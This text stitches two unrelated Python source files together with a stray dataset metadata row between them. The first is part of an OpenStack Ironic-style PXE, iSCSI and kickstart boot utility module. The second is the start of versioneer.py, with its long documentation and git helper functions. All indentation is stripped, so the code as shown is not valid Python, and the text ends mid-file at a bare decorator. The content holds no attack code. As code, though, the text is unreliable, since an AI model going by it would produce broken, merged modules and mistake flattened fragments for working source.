def build_instance_pxe_options(task, pxe_info, ipxe_enabled=False):
pxe_opts = {}
node = task.node
for label, option in (('kernel', 'aki_path'),
('ramdisk', 'ari_path'),
('stage2', 'stage2_url'),
('ks_template', 'ks_template_path'),
('ks_cfg', 'ks_cfg_url')):
if label in pxe_info:
if ipxe_enabled or label in ('stage2', 'ks_template', 'ks_cfg'):
# NOTE(pas-ha) do not use Swift TempURLs for kernel and
# ramdisk of user image when boot_option is not local,
# as this breaks instance reboot later when temp urls
# have timed out.
pxe_opts[option] = get_http_url_path_from_label(
CONF.deploy.http_url, node.uuid, label)
else:
# It is possible that we don't have kernel/ramdisk or even
# image_source to determine if it's a whole disk image or not.
# For example, when transitioning to 'available' state
# for first time from 'manage' state.
pxe_opts[option] = get_path_relative_to_tftp_root(
pxe_info[label][1])
pxe_opts.setdefault('aki_path', 'no_kernel')
pxe_opts.setdefault('ari_path', 'no_ramdisk')
i_info = task.node.instance_info
try:
pxe_opts['ramdisk_opts'] = i_info['ramdisk_kernel_arguments']
except KeyError:
pass
try:
# TODO(TheJulia): Boot iso should change at a later point
# if we serve more than just as a pass-through.
if i_info.get('boot_iso'):
pxe_opts['boot_iso_url'] = '/'.join(
[CONF.deploy.http_url, node.uuid, 'boot_iso'])
except KeyError:
pass
return pxe_opts
def build_extra_pxe_options(task, ramdisk_params=None):
pxe_append_params = driver_utils.get_kernel_append_params(
task.node, default=CONF.pxe.kernel_append_params)
# Enable debug in IPA according to CONF.debug if it was not
# specified yet
if CONF.debug and 'ipa-debug' not in pxe_append_params:
pxe_append_params += ' ipa-debug=1'
if ramdisk_params:
pxe_append_params += ' ' + ' '.join(
('%s=%s' % tpl) if tpl[1] is not None else tpl[0]
for tpl in ramdisk_params.items())
if task and task.context.global_id:
pxe_append_params += (
' ipa-global-request-id=%s' % task.context.global_id)
return {'pxe_append_params': pxe_append_params,
'tftp_server': CONF.pxe.tftp_server,
'ipxe_timeout': CONF.pxe.ipxe_timeout * 1000}
def build_pxe_config_options(task, pxe_info, service=False,
ipxe_enabled=False, ramdisk_params=None):
"""Build the PXE config options for a node
This method builds the PXE boot options for a node,
given all the required parameters.
The options should then be passed to pxe_utils.create_pxe_config to
create the actual config files.
:param task: A TaskManager object
:param pxe_info: a dict of values to set on the configuration file
:param service: if True, build "service mode" pxe config for netboot-ed
user image and skip adding deployment image kernel and ramdisk info
to PXE options.
:param ipxe_enabled: Default false boolean to indicate if ipxe
is in use by the caller.
:param ramdisk_params: the parameters to be passed to the ramdisk.
as kernel command-line arguments.
:returns: A dictionary of pxe options to be used in the pxe bootfile
template.
"""
node = task.node
mode = deploy_utils.rescue_or_deploy_mode(node)
if service:
pxe_options = {}
elif (node.driver_internal_info.get('boot_from_volume')
and ipxe_enabled):
pxe_options = get_volume_pxe_options(task)
else:
pxe_options = build_deploy_pxe_options(task, pxe_info, mode=mode,
ipxe_enabled=ipxe_enabled)
# NOTE(pas-ha) we still must always add user image kernel and ramdisk
# info as later during switching PXE config to service mode the
# template will not be regenerated anew, but instead edited as-is.
# This can be changed later if/when switching PXE config will also use
# proper templating instead of editing existing files on disk.
pxe_options.update(build_instance_pxe_options(task, pxe_info,
ipxe_enabled=ipxe_enabled))
pxe_options.update(build_extra_pxe_options(task, ramdisk_params))
return pxe_options
def build_service_pxe_config(task, instance_image_info,
root_uuid_or_disk_id,
ramdisk_boot=False,
ipxe_enabled=False,
is_whole_disk_image=None,
anaconda_boot=False):
node = task.node
pxe_config_path = get_pxe_config_file_path(node.uuid,
ipxe_enabled=ipxe_enabled)
# NOTE(pas-ha) if it is takeover of ACTIVE node or node performing
# unrescue operation, first ensure that basic PXE configs and links
# are in place before switching pxe config
# NOTE(TheJulia): Also consider deploying a valid state to go ahead
# and check things before continuing, as otherwise deployments can
# fail if the agent was booted outside the direct actions of the
# boot interface.
if (node.provision_state in [states.ACTIVE, states.UNRESCUING,
states.DEPLOYING]
and not os.path.isfile(pxe_config_path)):
pxe_options = build_pxe_config_options(task, instance_image_info,
service=True,
ipxe_enabled=ipxe_enabled)
if ipxe_enabled:
pxe_config_template = deploy_utils.get_ipxe_config_template(node)
else:
pxe_config_template = deploy_utils.get_pxe_config_template(node)
create_pxe_config(task, pxe_options, pxe_config_template,
ipxe_enabled=ipxe_enabled)
if is_whole_disk_image is None:
is_whole_disk_image = node.driver_internal_info.get(
'is_whole_disk_image')
deploy_utils.switch_pxe_config(
pxe_config_path, root_uuid_or_disk_id,
boot_mode_utils.get_boot_mode(node),
is_whole_disk_image,
deploy_utils.is_trusted_boot_requested(node),
deploy_utils.is_iscsi_boot(task), ramdisk_boot,
ipxe_enabled=ipxe_enabled, anaconda_boot=anaconda_boot)
def _build_heartbeat_url(node_uuid):
api_version = 'v1'
heartbeat_api = '%s/heartbeat/{node_uuid}' % api_version
path = heartbeat_api.format(node_uuid=node_uuid)
return "/".join([deploy_utils.get_ironic_api_url(), path])
def build_kickstart_config_options(task):
"""Build the kickstart template options for a node
This method builds the kickstart template options for a node,
given all the required parameters.
The options should then be passed to pxe_utils.create_kickstart_config to
create the actual config files.
:param task: A TaskManager object
:returns: A dictionary of kickstart options to be used in the kickstart
template.
"""
ks_options = {}
node = task.node
manager_utils.add_secret_token(node, pregenerated=True)
node.save()
ks_options['liveimg_url'] = node.instance_info['image_url']
ks_options['agent_token'] = node.driver_internal_info['agent_secret_token']
ks_options['heartbeat_url'] = _build_heartbeat_url(node.uuid)
return ks_options
def get_volume_pxe_options(task):
"""Identify volume information for iPXE template generation."""
def __return_item_or_first_if_list(item):
if isinstance(item, list):
return item[0]
else:
return item
def __get_property(properties, key):
prop = __return_item_or_first_if_list(properties.get(key, ''))
if prop != '':
return prop
return __return_item_or_first_if_list(properties.get(key + 's', ''))
def __format_portal(portal, iqn, lun):
if ':' in portal:
host, port = portal.split(':')
else:
host = portal
port = ''
return ("iscsi:%(host)s::%(port)s:%(lun)s:%(iqn)s" %
{'host': host, 'port': port, 'lun': lun, 'iqn': iqn})
def __generate_iscsi_url(properties):
"""Returns iscsi url."""
iqn = __get_property(properties, 'target_iqn')
lun = __get_property(properties, 'target_lun')
if 'target_portals' in properties:
portals = properties.get('target_portals')
formatted_portals = []
for portal in portals:
formatted_portals.append(__format_portal(portal, iqn, lun))
return ' '.join(formatted_portals)
else:
portal = __get_property(properties, 'target_portal')
return __format_portal(portal, iqn, lun)
pxe_options = {}
node = task.node
boot_volume = node.driver_internal_info.get('boot_from_volume')
volume = objects.VolumeTarget.get_by_uuid(task.context,
boot_volume)
properties = volume.properties
if 'iscsi' in volume['volume_type']:
if 'auth_username' in properties:
pxe_options['username'] = properties['auth_username']
if 'auth_password' in properties:
pxe_options['password'] = properties['auth_password']
iscsi_initiator_iqn = None
for vc in task.volume_connectors:
if vc.type == 'iqn':
iscsi_initiator_iqn = vc.connector_id
pxe_options.update(
{'iscsi_boot_url': __generate_iscsi_url(volume.properties),
'iscsi_initiator_iqn': iscsi_initiator_iqn})
# NOTE(TheJulia): This may be the route to multi-path, define
# volumes via sanhook in the ipxe template and let the OS sort it out.
extra_targets = []
for target in task.volume_targets:
if target.boot_index != 0 and 'iscsi' in target.volume_type:
iscsi_url = __generate_iscsi_url(target.properties)
username = target.properties['auth_username']
password = target.properties['auth_password']
extra_targets.append({'url': iscsi_url,
'username': username,
'password': password})
pxe_options.update({'iscsi_volumes': extra_targets,
'boot_from_volume': True})
# TODO(TheJulia): FibreChannel boot, i.e. wwpn in volume_type
# for FCoE, should go here.
return pxe_options
def validate_boot_parameters_for_trusted_boot(node):
"""Check if boot parameters are valid for trusted boot."""
boot_mode = boot_mode_utils.get_boot_mode(node)
boot_option = deploy_utils.get_boot_option(node)
is_whole_disk_image = node.driver_internal_info.get('is_whole_disk_image')
# 'is_whole_disk_image' is not supported by trusted boot, because there is
# no Kernel/Ramdisk to measure at all.
if (boot_mode != 'bios'
or is_whole_disk_image
or boot_option != 'netboot'):
msg = (_("Trusted boot is only supported in BIOS boot mode with "
"netboot and without whole_disk_image, but Node "
"%(node_uuid)s was configured with boot_mode: %(boot_mode)s, "
"boot_option: %(boot_option)s, is_whole_disk_image: "
"%(is_whole_disk_image)s: at least one of them is wrong, and "
"this can be caused by enable secure boot.") %
{'node_uuid': node.uuid, 'boot_mode': boot_mode,
'boot_option': boot_option,
'is_whole_disk_image': is_whole_disk_image})
LOG.error(msg)
raise exception.InvalidParameterValue(msg)
def validate_kickstart_template(ks_template):
"""Validate the kickstart template
:param ks_template: Path to the kickstart template
:raises: InvalidKickstartTemplate
"""
ks_options = {'liveimg_url': 'fake_image_url',
'agent_token': 'fake_token',
'heartbeat_url': 'fake_heartbeat_url'}
params = {'ks_options': ks_options}
try:
rendered_tmpl = utils.render_template(ks_template, params, strict=True)
except jinja2.exceptions.UndefinedError as exc:
msg = (_("The kickstart template includes a variable that is not "
"a valid kickstart option. Rendering the template returned "
" %(msg)s. The valid options are %(valid_options)s.") %
{'msg': exc.message,
'valid_options': ','.join(ks_options.keys())})
raise exception.InvalidKickstartTemplate(msg)
missing_required_options = []
for var, value in ks_options.items():
if rendered_tmpl.find(value) == -1:
missing_required_options.append(var)
if missing_required_options:
msg = (_("Following required kickstart option variables are missing "
"from the kickstart template: %(missing_opts)s.") %
{'missing_opts': ','.join(missing_required_options)})
raise exception.InvalidKickstartTemplate(msg)
return rendered_tmpl
def validate_kickstart_file(ks_cfg):
"""Check if the kickstart file is valid
:param ks_cfg: Contents of kickstart file to validate
:raises: InvalidKickstartFile
"""
if not os.path.isfile('/usr/bin/ksvalidator'):
LOG.warning(
"Unable to validate the kickstart file as ksvalidator binary is "
"missing. Please install pykickstart package to enable "
"validation of kickstart file."
)
return
with tempfile.NamedTemporaryFile(
dir=CONF.tempdir, suffix='.cfg') as ks_file:
ks_file.writelines(ks_cfg)
try:
result = utils.execute(
'ksvalidator', ks_file.name, check_on_exit=[0], attempts=1
)
except processutils.ProcessExecutionError:
msg = _(("The kickstart file generated does not pass validation. "
"The ksvalidator tool returned following error(s): %s") %
(result))
raise exception.InvalidKickstartFile(msg)
def prepare_instance_pxe_config(task, image_info,
iscsi_boot=False,
ramdisk_boot=False,
ipxe_enabled=False,
anaconda_boot=False):
"""Prepares the config file for PXE boot
:param task: a task from TaskManager.
:param image_info: a dict of values of instance image
metadata to set on the configuration file.
:param iscsi_boot: if boot is from an iSCSI volume or not.
:param ramdisk_boot: if the boot is to a ramdisk configuration.
:param ipxe_enabled: Default false boolean to indicate if ipxe
is in use by the caller.
:param anaconda_boot: if the boot is to a anaconda ramdisk configuration.
:returns: None
"""
node = task.node
# Generate options for both IPv4 and IPv6, and they can be
# filtered down later based upon the port options.
# TODO(TheJulia): This should be re-tooled during the Victoria
# development cycle so that we call a single method and return
# combined options. The method we currently call is relied upon
# by two eternal projects, to changing the behavior is not ideal.
dhcp_opts = dhcp_options_for_instance(task, ipxe_enabled,
ip_version=4)
dhcp_opts += dhcp_options_for_instance(task, ipxe_enabled,
ip_version=6)
provider = dhcp_factory.DHCPFactory()
provider.update_dhcp(task, dhcp_opts)
pxe_config_path = get_pxe_config_file_path(
node.uuid, ipxe_enabled=ipxe_enabled)
if not os.path.isfile(pxe_config_path):
pxe_options = build_pxe_config_options(
task, image_info, service=ramdisk_boot or anaconda_boot,
ipxe_enabled=ipxe_enabled)
if ipxe_enabled:
pxe_config_template = (
deploy_utils.get_ipxe_config_template(node))
else:
pxe_config_template = (
deploy_utils.get_pxe_config_template(node))
create_pxe_config(
task, pxe_options, pxe_config_template,
ipxe_enabled=ipxe_enabled)
deploy_utils.switch_pxe_config(
pxe_config_path, None,
boot_mode_utils.get_boot_mode(node), False,
iscsi_boot=iscsi_boot, ramdisk_boot=ramdisk_boot,
ipxe_enabled=ipxe_enabled, anaconda_boot=anaconda_boot)
def prepare_instance_kickstart_config(task, image_info, anaconda_boot=False):
"""Prepare to boot anaconda ramdisk by generating kickstart file
:param task: a task from TaskManager.
:param image_info: a dict of values of instance image
metadata to set on the configuration file.
:param anaconda_boot: if the boot is to a anaconda ramdisk configuration.
"""
if not anaconda_boot:
return
ks_options = build_kickstart_config_options(task)
kickstart_template = image_info['ks_template'][1]
ks_cfg = utils.render_template(kickstart_template, ks_options)
ks_config_drive = ks_utils.prepare_config_drive(task)
if ks_config_drive:
ks_cfg = ks_cfg + ks_config_drive
utils.write_to_file(image_info['ks_cfg'][1], ks_cfg)
@image_cache.cleanup(priority=25)
class TFTPImageCache(image_cache.ImageCache):
def __init__(self):
master_path = CONF.pxe.tftp_master_path or None
super(TFTPImageCache, self).__init__(
master_path,
# MiB -> B
cache_size=CONF.pxe.image_cache_size * 1024 * 1024,
# min -> sec
cache_ttl=CONF.pxe.image_cache_ttl * 60)
def cache_ramdisk_kernel(task, pxe_info, ipxe_enabled=False):
"""Fetch the necessary kernels and ramdisks for the instance."""
ctx = task.context
node = task.node
t_pxe_info = copy.copy(pxe_info)
if ipxe_enabled:
path = os.path.join(get_ipxe_root_dir(), node.uuid)
else:
path = os.path.join(get_root_dir(), node.uuid)
fileutils.ensure_tree(path)
# anconda deploy will have 'stage2' as one of the labels in pxe_info dict
if 'stage2' in pxe_info.keys():
# stage2 will be stored in ipxe http directory. So make sure they
# exist.
fileutils.ensure_tree(
get_file_path_from_label(
node.uuid,
get_ipxe_root_dir(),
'stage2'
)
)
# ks_cfg is rendered later by the driver using ks_template. It cannot
# be fetched and cached.
t_pxe_info.pop('ks_cfg')
LOG.debug("Fetching necessary kernel and ramdisk for node %s",
node.uuid)
deploy_utils.fetch_images(ctx, TFTPImageCache(), list(t_pxe_info.values()),
CONF.force_raw_images)
def clean_up_pxe_env(task, images_info, ipxe_enabled=False):
"""Cleanup PXE environment of all the images in images_info.
Cleans up the PXE environment for the mentioned images in
images_info.
:param task: a TaskManager object
:param images_info: A dictionary of images whose keys are the image names
to be cleaned up (kernel, ramdisk, etc) and values are a tuple of
identifier and absolute path.
"""
for label in images_info:
path = images_info[label][1]
ironic_utils.unlink_without_raise(path)
clean_up_pxe_config(task, ipxe_enabled=ipxe_enabled)
TFTPImageCache().clean_up()
| apache-2.0 | -485,594,768,924,118,500 | 41.092563 | 178 | 0.61622 | false |
jseabold/statsmodels | versioneer.py | 2 | 68638 |
# Version: 0.18
"""The Versioneer - like a rocketeer, but for versions.
The Versioneer
==============
* like a rocketeer, but for versions!
* https://github.com/warner/python-versioneer
* Brian Warner
* License: Public Domain
* Compatible With: python2.6, 2.7, 3.2, 3.3, 3.4, 3.5, 3.6, and pypy
* [![Latest Version]
(https://pypip.in/version/versioneer/badge.svg?style=flat)
](https://pypi.python.org/pypi/versioneer/)
* [![Build Status]
(https://travis-ci.org/warner/python-versioneer.png?branch=master)
](https://travis-ci.org/warner/python-versioneer)
This is a tool for managing a recorded version number in distutils-based
python projects. The goal is to remove the tedious and error-prone "update
the embedded version string" step from your release process. Making a new
release should be as easy as recording a new tag in your version-control
system, and maybe making new tarballs.
## Quick Install
* `pip install versioneer` to somewhere to your $PATH
* add a `[versioneer]` section to your setup.cfg (see below)
* run `versioneer install` in your source tree, commit the results
## Version Identifiers
Source trees come from a variety of places:
* a version-control system checkout (mostly used by developers)
* a nightly tarball, produced by build automation
* a snapshot tarball, produced by a web-based VCS browser, like github's
"tarball from tag" feature
* a release tarball, produced by "setup.py sdist", distributed through PyPI
Within each source tree, the version identifier (either a string or a number,
this tool is format-agnostic) can come from a variety of places:
* ask the VCS tool itself, e.g. "git describe" (for checkouts), which knows
about recent "tags" and an absolute revision-id
* the name of the directory into which the tarball was unpacked
* an expanded VCS keyword ($Id$, etc)
* a `_version.py` created by some earlier build step
For released software, the version identifier is closely related to a VCS
tag. Some projects use tag names that include more than just the version
string (e.g. "myproject-1.2" instead of just "1.2"), in which case the tool
needs to strip the tag prefix to extract the version identifier. For
unreleased software (between tags), the version identifier should provide
enough information to help developers recreate the same tree, while also
giving them an idea of roughly how old the tree is (after version 1.2, before
version 1.3). Many VCS systems can report a description that captures this,
for example `git describe --tags --dirty --always` reports things like
"0.7-1-g574ab98-dirty" to indicate that the checkout is one revision past the
0.7 tag, has a unique revision id of "574ab98", and is "dirty" (it has
uncommitted changes.
The version identifier is used for multiple purposes:
* to allow the module to self-identify its version: `myproject.__version__`
* to choose a name and prefix for a 'setup.py sdist' tarball
## Theory of Operation
Versioneer works by adding a special `_version.py` file into your source
tree, where your `__init__.py` can import it. This `_version.py` knows how to
dynamically ask the VCS tool for version information at import time.
`_version.py` also contains `$Revision$` markers, and the installation
process marks `_version.py` to have this marker rewritten with a tag name
during the `git archive` command. As a result, generated tarballs will
contain enough information to get the proper version.
To allow `setup.py` to compute a version too, a `versioneer.py` is added to
the top level of your source tree, next to `setup.py` and the `setup.cfg`
that configures it. This overrides several distutils/setuptools commands to
compute the version when invoked, and changes `setup.py build` and `setup.py
sdist` to replace `_version.py` with a small static file that contains just
the generated version data.
## Installation
See [INSTALL.md](./INSTALL.md) for detailed installation instructions.
## Version-String Flavors
Code which uses Versioneer can learn about its version string at runtime by
importing `_version` from your main `__init__.py` file and running the
`get_versions()` function. From the "outside" (e.g. in `setup.py`), you can
import the top-level `versioneer.py` and run `get_versions()`.
Both functions return a dictionary with different flavors of version
information:
* `['version']`: A condensed version string, rendered using the selected
style. This is the most commonly used value for the project's version
string. The default "pep440" style yields strings like `0.11`,
`0.11+2.g1076c97`, or `0.11+2.g1076c97.dirty`. See the "Styles" section
below for alternative styles.
* `['full-revisionid']`: detailed revision identifier. For Git, this is the
full SHA1 commit id, e.g. "1076c978a8d3cfc70f408fe5974aa6c092c949ac".
* `['date']`: Date and time of the latest `HEAD` commit. For Git, it is the
commit date in ISO 8601 format. This will be None if the date is not
available.
* `['dirty']`: a boolean, True if the tree has uncommitted changes. Note that
this is only accurate if run in a VCS checkout, otherwise it is likely to
be False or None
* `['error']`: if the version string could not be computed, this will be set
to a string describing the problem, otherwise it will be None. It may be
useful to throw an exception in setup.py if this is set, to avoid e.g.
creating tarballs with a version string of "unknown".
Some variants are more useful than others. Including `full-revisionid` in a
bug report should allow developers to reconstruct the exact code being tested
(or indicate the presence of local changes that should be shared with the
developers). `version` is suitable for display in an "about" box or a CLI
`--version` output: it can be easily compared against release notes and lists
of bugs fixed in various releases.
The installer adds the following text to your `__init__.py` to place a basic
version in `YOURPROJECT.__version__`:
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
## Styles
The setup.cfg `style=` configuration controls how the VCS information is
rendered into a version string.
The default style, "pep440", produces a PEP440-compliant string, equal to the
un-prefixed tag name for actual releases, and containing an additional "local
version" section with more detail for in-between builds. For Git, this is
TAG[+DISTANCE.gHEX[.dirty]] , using information from `git describe --tags
--dirty --always`. For example "0.11+2.g1076c97.dirty" indicates that the
tree is like the "1076c97" commit but has uncommitted changes (".dirty"), and
that this commit is two revisions ("+2") beyond the "0.11" tag. For released
software (exactly equal to a known tag), the identifier will only contain the
stripped tag, e.g. "0.11".
Other styles are available. See [details.md](details.md) in the Versioneer
source tree for descriptions.
## Debugging
Versioneer tries to avoid fatal errors: if something goes wrong, it will tend
to return a version of "0+unknown". To investigate the problem, run `setup.py
version`, which will run the version-lookup code in a verbose mode, and will
display the full contents of `get_versions()` (including the `error` string,
which may help identify what went wrong).
## Known Limitations
Some situations are known to cause problems for Versioneer. This details the
most significant ones. More can be found on Github
[issues page](https://github.com/warner/python-versioneer/issues).
### Subprojects
Versioneer has limited support for source trees in which `setup.py` is not in
the root directory (e.g. `setup.py` and `.git/` are *not* siblings). The are
two common reasons why `setup.py` might not be in the root:
* Source trees which contain multiple subprojects, such as
[Buildbot](https://github.com/buildbot/buildbot), which contains both
"master" and "slave" subprojects, each with their own `setup.py`,
`setup.cfg`, and `tox.ini`. Projects like these produce multiple PyPI
distributions (and upload multiple independently-installable tarballs).
* Source trees whose main purpose is to contain a C library, but which also
provide bindings to Python (and perhaps other langauges) in subdirectories.
Versioneer will look for `.git` in parent directories, and most operations
should get the right version string. However `pip` and `setuptools` have bugs
and implementation details which frequently cause `pip install .` from a
subproject directory to fail to find a correct version string (so it usually
defaults to `0+unknown`).
`pip install --editable .` should work correctly. `setup.py install` might
work too.
Pip-8.1.1 is known to have this problem, but hopefully it will get fixed in
some later version.
[Bug #38](https://github.com/warner/python-versioneer/issues/38) is tracking
this issue. The discussion in
[PR #61](https://github.com/warner/python-versioneer/pull/61) describes the
issue from the Versioneer side in more detail.
[pip PR#3176](https://github.com/pypa/pip/pull/3176) and
[pip PR#3615](https://github.com/pypa/pip/pull/3615) contain work to improve
pip to let Versioneer work correctly.
Versioneer-0.16 and earlier only looked for a `.git` directory next to the
`setup.cfg`, so subprojects were completely unsupported with those releases.
### Editable installs with setuptools <= 18.5
`setup.py develop` and `pip install --editable .` allow you to install a
project into a virtualenv once, then continue editing the source code (and
test) without re-installing after every change.
"Entry-point scripts" (`setup(entry_points={"console_scripts": ..})`) are a
convenient way to specify executable scripts that should be installed along
with the python package.
These both work as expected when using modern setuptools. When using
setuptools-18.5 or earlier, however, certain operations will cause
`pkg_resources.DistributionNotFound` errors when running the entrypoint
script, which must be resolved by re-installing the package. This happens
when the install happens with one version, then the egg_info data is
regenerated while a different version is checked out. Many setup.py commands
cause egg_info to be rebuilt (including `sdist`, `wheel`, and installing into
a different virtualenv), so this can be surprising.
[Bug #83](https://github.com/warner/python-versioneer/issues/83) describes
this one, but upgrading to a newer version of setuptools should probably
resolve it.
### Unicode version strings
While Versioneer works (and is continually tested) with both Python 2 and
Python 3, it is not entirely consistent with bytes-vs-unicode distinctions.
Newer releases probably generate unicode version strings on py2. It's not
clear that this is wrong, but it may be surprising for applications when then
write these strings to a network connection or include them in bytes-oriented
APIs like cryptographic checksums.
[Bug #71](https://github.com/warner/python-versioneer/issues/71) investigates
this question.
## Updating Versioneer
To upgrade your project to a new release of Versioneer, do the following:
* install the new Versioneer (`pip install -U versioneer` or equivalent)
* edit `setup.cfg`, if necessary, to include any new configuration settings
indicated by the release notes. See [UPGRADING](./UPGRADING.md) for details.
* re-run `versioneer install` in your source tree, to replace
`SRC/_version.py`
* commit any changed files
## Future Directions
This tool is designed to make it easily extended to other version-control
systems: all VCS-specific components are in separate directories like
src/git/ . The top-level `versioneer.py` script is assembled from these
components by running make-versioneer.py . In the future, make-versioneer.py
will take a VCS name as an argument, and will construct a version of
`versioneer.py` that is specific to the given VCS. It might also take the
configuration arguments that are currently provided manually during
installation by editing setup.py . Alternatively, it might go the other
direction and include code from all supported VCS systems, reducing the
number of intermediate scripts.
## License
To make Versioneer easier to embed, all its code is dedicated to the public
domain. The `_version.py` that it creates is also in the public domain.
Specifically, both are released under the Creative Commons "Public Domain
Dedication" license (CC0-1.0), as described in
https://creativecommons.org/publicdomain/zero/1.0/ .
"""
from __future__ import print_function
try:
import configparser
except ImportError:
import ConfigParser as configparser
import errno
import json
import os
import re
import subprocess
import sys
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_root():
"""Get the project root directory.
We require that all commands are run from the project root, i.e. the
directory that contains setup.py, setup.cfg, and versioneer.py .
"""
root = os.path.realpath(os.path.abspath(os.getcwd()))
setup_py = os.path.join(root, "setup.py")
versioneer_py = os.path.join(root, "versioneer.py")
if not (os.path.exists(setup_py) or os.path.exists(versioneer_py)):
# allow 'python path/to/setup.py COMMAND'
root = os.path.dirname(os.path.realpath(os.path.abspath(sys.argv[0])))
setup_py = os.path.join(root, "setup.py")
versioneer_py = os.path.join(root, "versioneer.py")
if not (os.path.exists(setup_py) or os.path.exists(versioneer_py)):
err = ("Versioneer was unable to run the project root directory. "
"Versioneer requires setup.py to be executed from "
"its immediate directory (like 'python setup.py COMMAND'), "
"or in a way that lets it use sys.argv[0] to find the root "
"(like 'python path/to/setup.py COMMAND').")
raise VersioneerBadRootError(err)
try:
# Certain runtime workflows (setup.py install/develop in a setuptools
# tree) execute all dependencies in a single python process, so
# "versioneer" may be imported multiple times, and python's shared
# module-import table will cache the first one. So we cannot use
# os.path.dirname(__file__), as that will find whichever
# versioneer.py was first imported, even in later projects.
me = os.path.realpath(os.path.abspath(__file__))
me_dir = os.path.normcase(os.path.splitext(me)[0])
vsr_dir = os.path.normcase(os.path.splitext(versioneer_py)[0])
if me_dir != vsr_dir:
print("Warning: build in %s is using versioneer.py from %s"
% (os.path.dirname(me), versioneer_py))
except NameError:
pass
return root
def get_config_from_root(root):
"""Read the project setup.cfg file to determine Versioneer config."""
# This might raise EnvironmentError (if setup.cfg is missing), or
# configparser.NoSectionError (if it lacks a [versioneer] section), or
# configparser.NoOptionError (if it lacks "VCS="). See the docstring at
# the top of versioneer.py for instructions on writing your setup.cfg .
setup_cfg = os.path.join(root, "setup.cfg")
parser = configparser.SafeConfigParser()
with open(setup_cfg, "r") as f:
parser.readfp(f)
VCS = parser.get("versioneer", "VCS") # mandatory
def get(parser, name):
if parser.has_option("versioneer", name):
return parser.get("versioneer", name)
return None
cfg = VersioneerConfig()
cfg.VCS = VCS
cfg.style = get(parser, "style") or ""
cfg.versionfile_source = get(parser, "versionfile_source")
cfg.versionfile_build = get(parser, "versionfile_build")
cfg.tag_prefix = get(parser, "tag_prefix")
if cfg.tag_prefix in ("''", '""'):
cfg.tag_prefix = ""
cfg.parentdir_prefix = get(parser, "parentdir_prefix")
cfg.verbose = get(parser, "verbose")
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
# these dictionaries contain VCS-specific tools
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False,
env=None):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, env=env,
stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None, None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None, None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
print("stdout was %s" % stdout)
return None, p.returncode
return stdout, p.returncode
LONG_VERSION_PY['git'] = '''
# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.18 (https://github.com/warner/python-versioneer)
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "%(DOLLAR)sFormat:%%d%(DOLLAR)s"
git_full = "%(DOLLAR)sFormat:%%H%(DOLLAR)s"
git_date = "%(DOLLAR)sFormat:%%ci%(DOLLAR)s"
keywords = {"refnames": git_refnames, "full": git_full, "date": git_date}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "%(STYLE)s"
cfg.tag_prefix = "%(TAG_PREFIX)s"
cfg.parentdir_prefix = "%(PARENTDIR_PREFIX)s"
cfg.versionfile_source = "%(VERSIONFILE_SOURCE)s"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Decorator to mark a method as the handler for a particular VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False,
env=None):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen([c] + args, cwd=cwd, env=env,
stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr
else None))
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %%s" %% dispcmd)
print(e)
return None, None
else:
if verbose:
print("unable to find command, tried %%s" %% (commands,))
return None, None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %%s (error)" %% dispcmd)
print("stdout was %%s" %% stdout)
return None, p.returncode
return stdout, p.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes both
the project name and a version string. We will also support searching up
two directory levels for an appropriately named parent directory
"""
rootdirs = []
for i in range(3):
dirname = os.path.basename(root)
if dirname.startswith(parentdir_prefix):
return {"version": dirname[len(parentdir_prefix):],
"full-revisionid": None,
"dirty": False, "error": None, "date": None}
else:
rootdirs.append(root)
root = os.path.dirname(root) # up a level
if verbose:
print("Tried directories %%s but none started with prefix %%s" %%
(str(rootdirs), parentdir_prefix))
raise NotThisMethod("rootdir does not start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
